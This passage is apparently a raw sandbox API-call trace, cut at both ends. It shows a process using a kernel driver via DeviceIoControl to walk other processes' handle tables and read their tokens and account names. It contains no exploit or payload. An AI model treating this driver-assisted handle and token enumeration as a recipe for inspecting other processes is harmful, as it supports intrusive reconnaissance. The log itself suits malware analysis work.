PsReleaseProcessExitSynchronization () returned 0x2 [0161.704] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.704] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022cd044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022cd044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.704] ObfDereferenceObject (Object=0xfffffa8002432390) returned 0x1 [0161.705] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.705] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.705] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.705] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0161.705] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.705] PsAcquireProcessExitSynchronization () returned 0x0 [0161.705] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.705] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000fa9eb0, HandleInformation=0x0) returned 0x0 [0161.705] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.705] PsReleaseProcessExitSynchronization () returned 0x2 [0161.705] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.705] ObQueryNameString (in: Object=0xfffff8a000fa9eb0, ObjectNameInfo=0xfffffa80022ce044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022ce044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.705] ObfDereferenceObject (Object=0xfffff8a000fa9eb0) returned 0xe [0161.705] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.705] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.705] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.705] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0161.705] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.705] PsAcquireProcessExitSynchronization () returned 0x0 [0161.706] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.706] ObReferenceObjectByHandle (in: Handle=0x198, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80024719e0, HandleInformation=0x0) returned 0x0 [0161.706] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.706] PsReleaseProcessExitSynchronization () returned 0x2 [0161.706] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.706] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022cf044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022cf044, ReturnLength=0xfffff88005163508) returned 0x0 [0161.706] ObfDereferenceObject (Object=0xfffffa80024719e0) returned 0x12 [0161.706] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.706] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.706] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.706] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0161.706] PsLookupProcessByProcessId (in: ProcessId=0x92c, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0161.706] PsAcquireProcessExitSynchronization () returned 0x0 [0161.706] KeStackAttachProcess (in: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80021226d0, ApcState=0xfffff880051635d0) [0161.706] ObReferenceObjectByHandle (in: Handle=0x19c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00229a060, HandleInformation=0x0) returned 0x0 [0161.706] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0161.706] PsReleaseProcessExitSynchronization () returned 0x2 [0161.706] ObfDereferenceObject (Object=0xfffffa80021226d0) returned 0x43 [0161.706] ObQueryNameString (in: Object=0xfffff8a00229a060, ObjectNameInfo=0xfffffa80022d0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80022d0044, ReturnLength=0xfffff88005163550) returned 0x0 [0161.706] ObfDereferenceObject (Object=0xfffff8a00229a060) returned 0x1 [0161.706] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.707] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.707] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9bc) returned 0x0 [0161.707] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.707] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0161.707] PsLookupProcessByProcessId (in: ProcessId=0x9bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0161.707] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0161.707] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0161.707] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0161.707] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0161.707] PsLookupProcessByProcessId (in: ProcessId=0x9bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0161.707] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.078] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.078] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.078] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.078] PsLookupProcessByProcessId (in: ProcessId=0x9bc, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.078] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.079] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.079] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xc8 [0162.079] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.079] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa8003206b30, HandleInformation=0x0) returned 0x0 [0162.079] ObOpenObjectByPointer (in: Object=0xfffffa8003206b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0162.079] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0x10 [0162.079] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa80024ccb80 | out: TokenHandle=0xfffffa80024ccb80*=0xc4) returned 0x0 [0162.079] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0162.079] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.079] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.080] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0162.082] CloseHandle (hObject=0xc4) returned 1 [0162.082] CloseHandle (hObject=0xc8) returned 1 [0162.082] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.082] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.082] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.083] PsAcquireProcessExitSynchronization () returned 0x0 [0162.083] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0) [0162.083] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80030e0960, HandleInformation=0x0) returned 0x0 [0162.083] ObfDereferenceObject (Object=0xfffffa80030e0960) returned 0x1 [0162.083] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.083] PsReleaseProcessExitSynchronization () returned 0x2 [0162.083] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0xe [0162.083] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.083] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.083] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.083] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.084] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.084] PsAcquireProcessExitSynchronization () returned 0x0 [0162.084] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0) [0162.084] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003031810, HandleInformation=0x0) returned 0x0 [0162.084] ObfDereferenceObject (Object=0xfffffa8003031810) returned 0x1 [0162.084] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.084] PsReleaseProcessExitSynchronization () returned 0x2 [0162.084] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0xe [0162.084] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.084] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.084] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.085] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.085] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.085] PsAcquireProcessExitSynchronization () returned 0x0 [0162.085] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0) [0162.085] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0162.085] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.085] PsReleaseProcessExitSynchronization () returned 0x2 [0162.085] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0xe [0162.085] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.085] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.085] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.085] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.086] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.086] PsAcquireProcessExitSynchronization () returned 0x0 [0162.086] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0) [0162.086] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0162.086] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.086] PsReleaseProcessExitSynchronization () returned 0x2 [0162.086] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0xe [0162.086] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.086] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.086] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.087] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.087] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.087] PsAcquireProcessExitSynchronization () returned 0x0 [0162.087] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0) [0162.087] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0162.087] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.087] PsReleaseProcessExitSynchronization () returned 0x2 [0162.087] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0xe [0162.087] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.087] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.088] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.088] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.088] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.088] PsAcquireProcessExitSynchronization () returned 0x0 [0162.088] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0) [0162.088] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0162.088] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.088] PsReleaseProcessExitSynchronization () returned 0x2 [0162.088] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0xe [0162.088] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.088] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.089] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.089] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.089] PsLookupProcessByProcessId (in: ProcessId=0x644, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.089] PsAcquireProcessExitSynchronization () returned 0x0 [0162.089] KeStackAttachProcess (in: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa8003206b30, ApcState=0xfffff880051635d0) [0162.089] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0x0, HandleInformation=0x0) returned 0xc0000008 [0162.089] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.089] PsReleaseProcessExitSynchronization () returned 0x2 [0162.089] ObfDereferenceObject (Object=0xfffffa8003206b30) returned 0xe [0162.089] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.090] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.090] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c4) returned 0xc8 [0162.090] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.090] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa800207b530, HandleInformation=0x0) returned 0x0 [0162.090] ObOpenObjectByPointer (in: Object=0xfffffa800207b530, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0162.090] ObfDereferenceObject (Object=0xfffffa800207b530) returned 0x14 [0162.090] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa80024ccb80 | out: TokenHandle=0xfffffa80024ccb80*=0xc4) returned 0x0 [0162.090] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0162.090] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.091] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.091] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0162.120] CloseHandle (hObject=0xc4) returned 1 [0162.121] CloseHandle (hObject=0xc8) returned 1 [0162.121] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.121] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0162.121] PsLookupProcessByProcessId (in: ProcessId=0x1c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.121] PsAcquireProcessExitSynchronization () returned 0x0 [0162.121] KeStackAttachProcess (in: PROCESS=0xfffffa800207b530, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800207b530, ApcState=0xfffff880051635d0) [0162.121] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002079d10, HandleInformation=0x0) returned 0x0 [0162.121] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.121] PsReleaseProcessExitSynchronization () returned 0x2 [0162.121] ObfDereferenceObject (Object=0xfffffa800207b530) returned 0x12 [0162.121] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022d8044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022d8044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.121] ObfDereferenceObject (Object=0xfffffa8002079d10) returned 0x1 [0162.121] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.122] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.122] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.122] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0162.122] PsLookupProcessByProcessId (in: ProcessId=0x1c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.122] PsAcquireProcessExitSynchronization () returned 0x0 [0162.122] KeStackAttachProcess (in: PROCESS=0xfffffa800207b530, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800207b530, ApcState=0xfffff880051635d0) [0162.122] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8002198f20, HandleInformation=0x0) returned 0x0 [0162.122] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.122] PsReleaseProcessExitSynchronization () returned 0x2 [0162.122] ObfDereferenceObject (Object=0xfffffa800207b530) returned 0x12 [0162.122] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022d9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022d9044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.122] ObfDereferenceObject (Object=0xfffffa8002198f20) returned 0x1 [0162.122] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.122] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.123] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.123] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0162.123] PsLookupProcessByProcessId (in: ProcessId=0x1c4, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.123] PsAcquireProcessExitSynchronization () returned 0x0 [0162.123] KeStackAttachProcess (in: PROCESS=0xfffffa800207b530, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa800207b530, ApcState=0xfffff880051635d0) [0162.123] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 